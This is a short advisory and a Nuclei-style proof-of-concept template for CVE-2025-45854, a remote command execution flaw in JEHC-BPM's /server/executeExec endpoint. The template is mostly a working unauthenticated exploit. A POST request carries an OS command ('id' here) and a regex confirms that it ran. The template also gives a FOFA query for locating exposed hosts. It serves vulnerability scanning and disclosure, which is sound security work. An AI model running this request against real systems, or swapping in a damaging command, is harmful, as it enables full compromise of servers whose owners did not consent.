A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
PoC
id: CVE-2025-45854
info:
name: JEHC-BPM - Remote Code Execute
author: ritikchaddha
severity: critical
description: |
A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
impact: |
Unauthenticated attackers can execute arbitrary operating system commands through the /server/executeExec endpoint due to missing authorization checks, achieving complete server compromise.
remediation: |
Upgrade JEHC-BPM to a version later than 2.0.1 that implements proper authorization checks on the executeExec endpoint.
reference:
- https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
- https://nvd.nist.gov/vuln/detail/CVE-2025-45854
classification:
epss-score: 0.03156
epss-percentile: 0.87314
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-45854
cwe-id: CWE-862,CWE-434
metadata:
max-request: 1
product: jehc-bpm
fofa-query: body="JEHC"
tags: cve,cve2025,jehc-bpm,rce,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
words:
- "JEHC"
- "XSHI"
case-insensitive: true
internal: true
- raw:
- |
POST /server/executeExec HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{
"actuator": {
"clientIp": "127.0.0.1",
"port": 8082,
"applicationName": "testApp",
"env": "prod",
"uploadTime": 1704523200000,
"hasPrefixApplicationName": false,
"clientHttpPrefix": "http"
},
"execParams": {
"command": "id"
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 4b0a0048304602210083f2266d082e01b16b36d39c56f5832c18bcf1023a5a2ead1656200219f3c9390221009495c94e0ff70dd8249ca4cd5d3e22e327bec331443a0051b85672188fe1f23f:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.